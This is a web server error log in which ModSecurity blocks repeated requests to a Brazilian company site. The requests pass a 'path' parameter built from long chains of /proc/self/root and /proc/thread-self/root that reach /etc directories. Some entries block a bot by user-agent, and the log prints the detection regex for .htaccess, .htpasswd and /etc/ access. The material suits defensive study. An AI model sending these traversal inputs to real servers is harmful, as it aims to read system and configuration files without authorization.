[Mon Mar 16 19:02:01.615291 2026] [:error] [pid 15568:tid 140411649607424] [client 74.7.241.46:36220] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh92aQpVkWug9HeOt9V-QAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:02:08.060049 2026] [:error] [pid 21805:tid 140411674785536] [client 74.7.228.16:58456] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abh94LABkC4fWIHEf8EbJgAAAEg"]
[Mon Mar 16 19:02:15.449324 2026] [:error] [pid 15568:tid 140411590858496] [client 74.7.241.46:43310] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh956QpVkWug9HeOt9WBgAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:02:20.483023 2026] [:error] [pid 21805:tid 140411658000128] [client 74.7.241.46:56978] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh97LABkC4fWIHEf8EbKwAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:02:45.104726 2026] [:error] [pid 10772:tid 140411691570944] [client 74.7.241.46:55264] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh-Bf9ocpUE4ed4uDwWKAAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:02:51.548224 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.241.46:35096] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh-C7ABkC4fWIHEf8EbQgAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:02:55.795896 2026] [:error] [pid 10651:tid 140411582465792] [client 74.7.241.46:40722] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh-D7ysWC90G-1nBrBoKgAAAZM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:03:41.635580 2026] [:error] [pid 14895:tid 140411582465792] [client 74.7.241.46:40726] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh-PVajLEzk2WiQ-101PQAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:03:46.440646 2026] [:error] [pid 29802:tid 140411658000128] [client 74.7.241.46:34326] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh-Qs_BxrYCr4hPDw8NBgAAAco"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:03:54.118261 2026] [:error] [pid 21806:tid 140411540502272] [client 74.7.243.203:59488] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh-StSswJuvopo3lOiDVAAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc
[Mon Mar 16 19:05:03.558216 2026] [:error] [pid 15568:tid 140411649607424] [client 74.7.241.46:34336] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh-j6QpVkWug9HeOt9WaAAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:05:04.910421 2026] [:error] [pid 15061:tid 140411574073088] [client 74.7.241.46:33700] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh-kKTCbgAP5jq5TehNsgAAAtQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:05:05.319284 2026] [:error] [pid 10651:tid 140411658000128] [client 74.7.244.31:53678] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abh-kbysWC90G-1nBrBohQAAAYo"]
[Mon Mar 16 19:05:19.801592 2026] [:error] [pid 15568:tid 140411632822016] [client 74.7.241.46:33716] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh-n6QpVkWug9HeOt9WdgAAA00"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:05:42.794143 2026] [:error] [pid 10772:tid 140411616036608] [client 74.7.243.203:36486] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh-tv9ocpUE4ed4uDwWqgAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:05:50.836130 2026] [:error] [pid 10831:tid 140411641214720] [client 74.7.243.203:56354] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh-vo6lpbStxTqkSkuLpQAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:06:04.454942 2026] [:error] [pid 21806:tid 140411540502272] [client 74.7.241.46:60398] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh-zNSswJuvopo3lOiDmwAAAJg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:06:41.528005 2026] [:error] [pid 10651:tid 140411649607424] [client 74.7.241.46:52914] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh-8bysWC90G-1nBrBoswAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:06:42.817522 2026] [:error] [pid 10772:tid 140411699963648] [client 74.7.241.46:41780] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh-8v9ocpUE4ed4uDwWtgAAAgU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:06:50.522918 2026] [:error] [pid 14895:tid 140411607643904] [client 74.7.241.46:41794] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh--lajLEzk2WiQ-101iwAAApA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:06:55.000194 2026] [:error] [pid 10831:tid 140411624429312] [client 74.7.241.46:49756] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh-_o6lpbStxTqkSkuLxAAAAk4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:06:56.299091 2026] [:error] [pid 15061:tid 140411683178240] [client 74.7.241.46:49764] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_AKTCbgAP5jq5TehNxgAAAsc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:07:06.184770 2026] [:error] [pid 29507:tid 140411590858496] [client 74.7.241.46:49772] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_Ckr9dMAiw-8KANNr6wAAARI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
